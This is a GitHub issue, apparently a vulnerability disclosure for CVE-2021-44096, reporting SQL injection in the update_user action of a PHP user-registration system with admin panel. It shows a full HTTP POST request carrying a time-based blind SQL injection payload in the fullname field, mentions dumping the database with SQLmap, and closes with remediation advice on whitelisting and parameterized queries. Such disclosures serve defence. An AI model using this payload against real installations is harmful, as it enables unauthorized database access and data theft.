Headline
CVE-2021-44096: Vulnerability/BUG - SQL Injection on "profile_action - update_user" · Issue #2 · EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel
EGavilan Media User-Registration-and-Login-System-With-Admin-Panel 1.0 is vulnerable to SQL Injection via profile_action - update_user. This allows a remote attacker to compromise Application SQL database.
Hi
I found a SQL injection vulnerability User-Registration-and-Login-System-With-Admin-Panel
POST /User-Registration-and-Login-System-With-Admin-Panel-master/profile_action.php HTTP/1.1
Host: 192.168.1.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Origin: http://192.168.1.3
Connection: close
Referer: http://192.168.1.3/User-Registration-and-Login-System-With-Admin-Panel-master/profile.php
Cookie: PHPSESSID=54cet827kpno5c9g9i9grjq84h
fullname=test2’%2b(select*from(select(sleep(20)))a)%2b’&username=test1&email=test%40test.com&gender=Male&action=update_user
Above query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.
Control -
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.
Remediation -
To prevent this follow the following steps:
a) Validate all input data against a whitelist
b) Use of parameterized queries
String selectStatement = "SELECT * FROM User WHERE userId = ? ";
PreparedStatement prepStmt = con.prepareStatement(selectStatement);
prepStmt.setString(1, userId);
ResultSet rs = prepStmt.executeQuery();